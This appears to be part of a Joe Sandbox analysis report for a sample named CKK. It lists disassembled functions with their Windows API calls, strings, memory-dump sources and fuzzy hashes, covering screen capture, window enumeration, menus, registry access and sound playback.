Instruction ID: bb9b448d182fc89e90d752ddca5a9df9d7b0b4e692c64136627a86786189f0f4
Opcode Fuzzy Hash: 5c9affa7fb9150a5051074670c5fd915e63be12d6c8e68b7027df387da110661
Instruction Fuzzy Hash: 07C18E70214201AFD714DF14C895F2ABBE5BF84318F14C55CF5AA8B2A2CB71ED45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A7255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A725D8
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A725E8
CreateCompatibleDC.GDI32(?), ref: 00A725F4
SelectObject.GDI32(00000000,?), ref: 00A72601
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A7266D
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A726AC
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A726D0
SelectObject.GDI32(?,?), ref: 00A726D8
DeleteObject.GDI32(?), ref: 00A726E1
DeleteDC.GDI32(?), ref: 00A726E8
ReleaseDC.USER32(00000000,?), ref: 00A726F3

Strings

(, xrefs: 00A7268D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 180f1020b795e63587e18649e5952b4d1896f733ec9db2370677cc2c4bc28faf
Instruction ID: 14d31db7b44eddc74b8a8a5fb523517ead1f928475318abce3b8cfac2b0e2f24
Opcode Fuzzy Hash: 180f1020b795e63587e18649e5952b4d1896f733ec9db2370677cc2c4bc28faf
Instruction Fuzzy Hash: A061C275D00219EFCF14CFE4D984AAEBBB6FF48310F20852AE959A7250E774A9518F60

Uniqueness

Uniqueness Score: -1.00%

Function 00A2DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 00A2DAA1

Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D659
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D66B
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D67D
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D68F
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6A1
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6B3
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6C5
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6D7
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6E9
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D6FB
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D70D
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D71F
Part of subcall function 00A2D63C: _free.LIBCMT ref: 00A2D731

_free.LIBCMT ref: 00A2DA96

Part of subcall function 00A229C8: HeapFree.KERNEL32(00000000,00000000), ref: 00A229DE
Part of subcall function 00A229C8: GetLastError.KERNEL32(00000000,?,00A2D7D1,00000000,00000000,00000000,00000000,?,00A2D7F8,00000000,00000007,00000000,?,00A2DBF5,00000000,00000000), ref: 00A229F0

_free.LIBCMT ref: 00A2DAB8
_free.LIBCMT ref: 00A2DACD
_free.LIBCMT ref: 00A2DAD8
_free.LIBCMT ref: 00A2DAFA
_free.LIBCMT ref: 00A2DB0D
_free.LIBCMT ref: 00A2DB1B
_free.LIBCMT ref: 00A2DB26
_free.LIBCMT ref: 00A2DB5E
_free.LIBCMT ref: 00A2DB65
_free.LIBCMT ref: 00A2DB82
_free.LIBCMT ref: 00A2DB9A

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: b2507592b7fd88b268ca1f13bfd2e7b521e0a9021f9a80a7a12636b8c2b89b73
Instruction ID: 94dc03fcc23ac4ba594be561765488bad899c2659823ee97be16c92e2bc7cd59
Opcode Fuzzy Hash: b2507592b7fd88b268ca1f13bfd2e7b521e0a9021f9a80a7a12636b8c2b89b73
Instruction Fuzzy Hash: 6D315732604224AFEB22AB3CF945B5AB7E9FF44360F514839E449D7192DA30EC808B20

Uniqueness

Uniqueness Score: -1.00%

Function 00A5365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A5369C
_wcslen.LIBCMT ref: 00A536A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A53797
GetClassNameW.USER32(?,?,00000400), ref: 00A5380C
GetDlgCtrlID.USER32 ref: 00A5385D
GetWindowRect.USER32(?,?), ref: 00A53882
GetParent.USER32(?), ref: 00A538A0
ScreenToClient.USER32(00000000), ref: 00A538A7
GetClassNameW.USER32(?,?,00000100), ref: 00A53921
GetWindowTextW.USER32 ref: 00A5395D

Strings

%s%u, xrefs: 00A53734

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: 71821e763fdb467158f7209f716e600690f692265d956d98828fbf2cb2158eec
Instruction ID: fe094e045df4abbd8375dc30f572e63641499d03939fa4bf7629ab8af805d64b
Opcode Fuzzy Hash: 71821e763fdb467158f7209f716e600690f692265d956d98828fbf2cb2158eec
Instruction Fuzzy Hash: 4B91E772204606EFDB19DF64C894BEAF7A8FF84391F004529FD99C6150DB30EA59CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A54954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 00A54994
GetWindowTextW.USER32 ref: 00A549DA
_wcslen.LIBCMT ref: 00A549EB
CharUpperBuffW.USER32(?,00000000), ref: 00A549F7
_wcsstr.LIBVCRUNTIME ref: 00A54A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 00A54A64
GetWindowTextW.USER32 ref: 00A54A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 00A54AE6
GetClassNameW.USER32(?,?,00000400), ref: 00A54B20
GetWindowRect.USER32(?,?), ref: 00A54B8B

Strings

ThumbnailClass, xrefs: 00A54A6F, 00A54AF1

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 689a92b948fa35bcdfcc3f46bf813cc32325649aafd60f633fa3096313fa6e5b
Instruction ID: 7f1444b27fc0b16df2b8a69e203aab879eb4688b34d66688b5400542e10c5c31
Opcode Fuzzy Hash: 689a92b948fa35bcdfcc3f46bf813cc32325649aafd60f633fa3096313fa6e5b
Instruction Fuzzy Hash: CE91C2711043059FDB04DF14C985FAA77E8FF88359F048469FD899A196EB30ED89CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A88D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A09BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A09BB2

PostMessageW.USER32 ref: 00A88D5A
GetFocus.USER32 ref: 00A88D6A
GetDlgCtrlID.USER32 ref: 00A88D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00A88E1D
GetMenuItemInfoW.USER32 ref: 00A88ECF
GetMenuItemCount.USER32(?), ref: 00A88EEC
GetMenuItemID.USER32(?,00000000), ref: 00A88EFC
GetMenuItemInfoW.USER32 ref: 00A88F2E
GetMenuItemInfoW.USER32 ref: 00A88F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A88FA1

Strings

0, xrefs: 00A88E9F

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 71419764e9c69fe56525625d8b9188537f961458c81c300ed3aeb8da1b3128df
Instruction ID: ac64070170713593d2c56abafc5d4725f68f5753eb95d69593e96b6ff004924a
Opcode Fuzzy Hash: 71419764e9c69fe56525625d8b9188537f961458c81c300ed3aeb8da1b3128df
Instruction Fuzzy Hash: 59819E715083019FDB10EF24D984AAB7BE9FF88764F540929FA8597291DF38DD01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A7CC64
RegOpenKeyExW.ADVAPI32 ref: 00A7CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A7CD48

Part of subcall function 00A7CC34: RegCloseKey.ADVAPI32(?), ref: 00A7CCAA
Part of subcall function 00A7CC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A7CCBD
Part of subcall function 00A7CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 00A7CCCF
Part of subcall function 00A7CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A7CD05
Part of subcall function 00A7CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A7CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A7CCF3

Strings

RegDeleteKeyExW, xrefs: 00A7CCC9
advapi32.dll, xrefs: 00A7CCB8

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: be98ebf8f2b2f86ab4c0fcdd340b9ae14e98f474235757da09bd31f30c6fd16f
Instruction ID: d9ec58c1701caeb6b1ec1c9274c60b611e9152a1cfbe819fccc213c05c084ee6
Opcode Fuzzy Hash: be98ebf8f2b2f86ab4c0fcdd340b9ae14e98f474235757da09bd31f30c6fd16f
Instruction Fuzzy Hash: A9316071901129BBD721CB94DC88EFFBB7CEF45760F008169A909E3141D6749A469BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00A5E6B4

Part of subcall function 00A0E551: timeGetTime.WINMM ref: 00A0E555

Sleep.KERNEL32(0000000A), ref: 00A5E6E1
EnumThreadWindows.USER32 ref: 00A5E705
FindWindowExW.USER32 ref: 00A5E727
SetActiveWindow.USER32 ref: 00A5E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A5E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 00A5E773
Sleep.KERNEL32(000000FA), ref: 00A5E77E
IsWindow.USER32 ref: 00A5E78A
EndDialog.USER32 ref: 00A5E79B

Strings

BUTTON, xrefs: 00A5E719

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 75c91c962aba3154b39b9072fe5081ee036cd6cc4715e5ec5b8291db2e90619f
Instruction ID: 82b2077c8421511d5cdc3a6d2fddaeb92164863dc1b1a5355fd832fc5563422a
Opcode Fuzzy Hash: 75c91c962aba3154b39b9072fe5081ee036cd6cc4715e5ec5b8291db2e90619f
Instruction Fuzzy Hash: E221A1B1200244AFEB04DFA0ECC9F253B69FB5539AF111434F951825A2DF71AD0A9F34

Uniqueness

Uniqueness Score: -1.00%

Function 00A5E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A5EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A5EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A5EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A5EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A5EAA7

Strings

close PlayMe, xrefs: 00A5EA6E, 00A5EA9B
play PlayMe wait, xrefs: 00A5EA91
open , xrefs: 00A5EA0C
status PlayMe mode, xrefs: 00A5EA58
play PlayMe, xrefs: 00A5EAA2
alias PlayMe, xrefs: 00A5EA36

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 1b136cfd8cfe59d50d3c0edcb18c6b82125076968fa6998bf1971ea315e97720
Instruction ID: bfb738db95dc9cac215c27d8d1fb812a9a652336dcef4231c9a6cc283c740c17
Opcode Fuzzy Hash: 1b136cfd8cfe59d50d3c0edcb18c6b82125076968fa6998bf1971ea315e97720
Instruction Fuzzy Hash: D1115131A5022D79D724E7B1DC4AEFF7A7CFBD1B41F400829B911A20D1EAB40A45C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00A55CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00A55CE2
GetWindowRect.USER32(00000000,?), ref: 00A55CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004), ref: 00A55D59
GetDlgItem.USER32(?,00000002), ref: 00A55D69
GetWindowRect.USER32(00000000,?), ref: 00A55D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004), ref: 00A55DCF
GetDlgItem.USER32(?,000003E9), ref: 00A55DDD
GetWindowRect.USER32(00000000,?), ref: 00A55DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A55E31
GetDlgItem.USER32(?,000003EA), ref: 00A55E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A55E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00A55E67

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: aa43f2a8e0c7dfc1798a2aa1e2d9c226d9d373036011f897d3ca917104ca7799
Instruction ID: ffd1472167083d6d6861b921cf8fec93773ff89d8d54eea7eb67a01668b70352
Opcode Fuzzy Hash: aa43f2a8e0c7dfc1798a2aa1e2d9c226d9d373036011f897d3ca917104ca7799
Instruction Fuzzy Hash: DF51FE71E00605AFDF18CFA8DD99AAEBBB5BF48311F148129F915E6290E7709E05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A08BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00A08F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00A08FC5

DestroyWindow.USER32 ref: 00A08C81
KillTimer.USER32 ref: 00A08D1B
DestroyAcceleratorTable.USER32 ref: 00A46973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00A08BBA,00000000,?), ref: 00A469A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00A08BBA,00000000,?), ref: 00A469B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00A08BBA,00000000), ref: 00A469D4
DeleteObject.GDI32(00000000), ref: 00A469E6

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 34d94fa5486aa4953a118b5c55c90c59067b31536b8aeef12d6711e464dcb5c1
Instruction ID: dca589b830747a064fe4931bf27f4bf3edf48cd4c900bd6d54908c3a995556c8
Opcode Fuzzy Hash: 34d94fa5486aa4953a118b5c55c90c59067b31536b8aeef12d6711e464dcb5c1
Instruction Fuzzy Hash: C061BF30602604DFEB25DF64EA48B2577F1FB42312F14452CE0829B9A1CB79AD92DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00A09838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00A09944: GetWindowLongW.USER32(?,000000EB), ref: 00A09952

GetSysColor.USER32 ref: 00A09862

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: d20f43f4a37385496da65492a8a639af199f7676131a9da5e64ea4adaf235dd6
Instruction ID: e98b3be99deda8f817879170465d73a66066dcdb96a789909de7e04658456d03
Opcode Fuzzy Hash: d20f43f4a37385496da65492a8a639af199f7676131a9da5e64ea4adaf235dd6
Instruction Fuzzy Hash: 1341B7711046489FDB209F78AC88BBA3765FB46371F148615F9A28B2F3D7319C46DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00A596E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00A3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00A59717
LoadStringW.USER32(00000000,?,00A3F7F8,00000001), ref: 00A59720

Part of subcall function 009F9CB3: _wcslen.LIBCMT ref: 009F9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A3F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00A59742
LoadStringW.USER32(00000000,?,00A3F7F8,00000001), ref: 00A59745
MessageBoxW.USER32 ref: 00A59866

Strings

Line %d (File "%s"):, xrefs: 00A5978F
%s (%d) : ==> %s: %s %s, xrefs: 00A5984A
^ ERROR, xrefs: 00A597FB
Line %d:, xrefs: 00A597A0
Error: , xrefs: 00A5981D

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 0b2521d2de69238a526777c138752d2b8858eb10e2288b89e1720986264cf6bb
Instruction ID: 174fbf6f86ea86fea2b86f31300102ed606d54931038d58e83464470111cbb94
Opcode Fuzzy Hash: 0b2521d2de69238a526777c138752d2b8858eb10e2288b89e1720986264cf6bb
Instruction Fuzzy Hash: 62414A7280021DAACB04EBE0DE86FFEB778AF95341F504065F60676092EB756F49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A506DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A507A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A507BE
RegOpenKeyExW.ADVAPI32 ref: 00A507DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 00A50804
CLSIDFromString.OLE32(?,000001FE), ref: 00A5082C
RegCloseKey.ADVAPI32(?), ref: 00A50837
RegCloseKey.ADVAPI32(?), ref: 00A5083C

Strings

\CLSID, xrefs: 00A50724
SOFTWARE\Classes\, xrefs: 00A5070E
\IPC$, xrefs: 00A50784

Memory Dump Source

Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true

Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 240a254ded8c7a731d0085dd2983ab06581e03081fb0f67da77523ccbe7a85a8
Instruction ID: ccccd138e5e269271ef14ec9bf4f416a99d6b50d6a702840c029a7f4a3d23cd6
Opcode Fuzzy Hash: 240a254ded8c7a731d0085dd2983ab06581e03081fb0f67da77523ccbe7a85a8
Instruction Fuzzy Hash: 7541F572C1022DABDF15EBA4DC85EFDB7B8BF44390F444129E905A3161EB709E48CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A67A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A67AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A67B8F
SHGetDesktopFolder.SHELL32(?), ref: 00A67BA3
